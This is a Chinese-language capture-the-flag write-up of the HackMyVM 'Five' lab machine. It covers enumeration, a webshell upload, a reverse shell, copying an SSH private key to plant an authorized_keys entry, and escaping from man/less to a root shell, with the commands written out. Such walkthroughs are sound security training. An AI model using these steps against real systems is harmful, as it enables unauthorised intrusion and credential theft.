HMV-Five靶机复盘

端口扫描

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.112.17  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-18 10:47 CST
Nmap scan report for bogon (192.168.112.17)
Host is up (0.0024s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-title: 403 Forbidden
MAC Address: B6:07:F9:39:F0:32 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   2.39 ms bogon (192.168.112.17)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.94 seconds

只有80端口，而且nmap扫出来了/admin路径那就直接进入web部分

web探测

直接curl一下发现403了，猜测可能要改host，去浏览器里面访问看看

还真的就是403，域名这边也没有变化，那就去/admin里面看
发现是一个登录界面，登录错误有回显，那就先用bp爆破一下
用户名用admin爆破了一下密码，没有爆破出来
用gobuster扫一下目录吧

┌──(root㉿kakeru)-[~/tmp]
└─# gobuster dir -u http://192.168.112.17/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,jpg,webg,png,js,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.112.17/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,jpg,webg,png,js,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 185] [--> http://192.168.112.17/uploads/]
/admin                (Status: 301) [Size: 185] [--> http://192.168.112.17/admin/]
/upload.html          (Status: 200) [Size: 346]
/upload.php           (Status: 200) [Size: 48]
/robots.txt           (Status: 200) [Size: 17]
Progress: 743223 / 1661152 (44.74%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 744172 / 1661152 (44.80%)
===============================================================
Finished
===============================================================
                                                                     

这里有一个upload.html界面可以上传文件

上传一个一句话木马1.php，成功上传，而且跳转到upload.php这里

现在的目标就是找到上传的位置，然后用蚁剑连接了。
抓包用bp查看，可以看到是上传到uploads/目录下面，但是这个目录下我无法访问

那就把这个路径删除，让它上传到根目录
现在用蚁剑就可以成功连接了，那现在就进入蚁剑的虚拟终端里面反弹shell
因为蚁剑的这个虚拟终端不是一个真正的终端，所以不能直接用

成功拿到shell

┌──(root㉿kakeru)-[~/tmp]
└─# nc -lp 1234           
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
script -qc /bin/bash /dev/null
www-data@five:~/html$ ^Z
zsh: suspended  nc -lp 1234
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# cat bbb            
stty raw -echo; fg
                                                                                                                                                        
┌──(root㉿kakeru)-[~/tmp]
└─# stty raw -echo; fg
[1]  + continued  nc -lp 1234
                             reset
reset: unknown terminal type unknown
Terminal type? xterm

提权

www

先去看一下www用户的sudo权限，发现有一个用户的cp命令

www-data@five:/var$ sudo -l
Matching Defaults entries for www-data on five:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on five:
    (melisa) NOPASSWD: /bin/cp

去用户的目录下面看，发现有.ssh，那我的原来目标就是去拿ssh私钥,但是这个靶机没有开放22端口
但是我去看开放了什么端口，发现有一个4444端口

www-data@five:/home/melisa$ ss -tulnp
Netid       State        Recv-Q       Send-Q             Local Address:Port               Peer Address:Port                                             
udp         UNCONN       0            0                        0.0.0.0:68                      0.0.0.0:*                                                
tcp         LISTEN       0            128                      0.0.0.0:80                      0.0.0.0:*           users:(("nginx",pid=384,fd=6))       
tcp         LISTEN       0            128                    127.0.0.1:4444                    0.0.0.0:*                                                
tcp         LISTEN       0            128                         [::]:80                         [::]:*           users:(("nginx",pid=384,fd=7))  

说不定可行
复制私钥过来，发现4444端口是可以登录的，但是permission deny了

www-data@five:/home/melisa$ sudo -u melisa cp /home/melisa/.ssh/id_rsa /tmp
www-data@five:/home/melisa$ cd /tmp
www-data@five:/tmp$ chmod 600 id_rsa
chmod: changing permissions of 'id_rsa': Operation not permitted


www-data@five:/tmp$ ssh melisa@127.0.0.1 -p 4444 -i id_rsa
Could not create directory '/var/www/.ssh'.
The authenticity of host '[127.0.0.1]:4444 ([127.0.0.1]:4444)' can't be established.
ECDSA key fingerprint is SHA256:jWQpYhXQJtOuJfrNjZvNSilLDT7fkbFxeioQzGTBY7Y.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Load key "id_rsa": Permission denied

看了wp知道原来是没有公钥,用ssh-keygen可以生成公钥

www-data@five:/tmp$ ssh-keygen -y -f id_rsa > authorized_keys
Load key "id_rsa": Permission denied

这里因为id_rsa是melisa的，www用户权限不足
解决方法是我们自己创建一个文件，这个文件就有权限了，然后用sudo把内容也复制过来

www-data@five:/tmp$ sudo -u melisa /bin/cp /tmp/id_rsa /tmp/id
/bin/cp: cannot create regular file '/tmp/id': Permission denied

www-data@five:/tmp$ chmod 777 id
www-data@five:/tmp$ sudo -u melisa /bin/cp /tmp/id_rsa /tmp/id

www-data@five:/tmp$ ssh-keygen -y -f id > authorized_keys
www-data@five:/tmp$ sudo -u melisa /bin/cp /tmp/authorized_keys /home/melisa/.ssh

成功生成私钥，并且放到用户的.ssh目录下面了

成功登录了

www-data@five:/tmp$ ssh melisa@127.0.0.1 -p 4444 -i id
Could not create directory '/var/www/.ssh'.
The authenticity of host '[127.0.0.1]:4444 ([127.0.0.1]:4444)' can't be established.
ECDSA key fingerprint is SHA256:jWQpYhXQJtOuJfrNjZvNSilLDT7fkbFxeioQzGTBY7Y.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
Linux five 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Oct  6 03:39:32 2020 from 192.168.1.58
melisa@five:~$ 

melisa

有sudo

melisa@five:~$ sudo -l
Matching Defaults entries for melisa on five:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User melisa may run the following commands on five:
    (ALL) SETENV: NOPASSWD: /bin/pwd, /bin/arch, /bin/man, /bin/id, /bin/rm, /bin/clear

找到man提权的方式

但是报错了

melisa@five:~$ sudo man man
Your terminal lacks the ability to clear the screen or position the cursor.

man: command exited with status 1: sed -e '/^[[:space:]]*$/{ N; /^[[:space:]]*\n[[:space:]]*$/D; }' | LESS=-ix8RmPm Manual page man(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB\%.. (press h for help or q to quit)$PM Manual page man(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB\%.. (press h for help or q to quit)$ MAN_PN=man(1) pager

看了wp，原来是分页的模式不同，要用less分页执行

melisa@five:~$ sudo /bin/man -P /usr/bin/less man
WARNING: terminal is not fully functional
-  (press RETURN)!//bbiinn//bbaasshh!/bin/bash
root@five:/home/melisa# 

这里的意思就相当于用less作为分页器来看man的操作手册。 -P用于指定分页器

总结

学习到了如果上传的文件所在目录没有访问权限的时候解决方案->上传到根目录
用私钥生成公钥以及有cp权限时候的注意事项（自己可以先创建有一个权限的文件）
ssh无法登录的原因之一：端口未开放或者没有对应的公钥
man提权的时候遇到问题，可以指定分页器

再复习一下私钥权限是600 公钥权限是644
还是收获不少的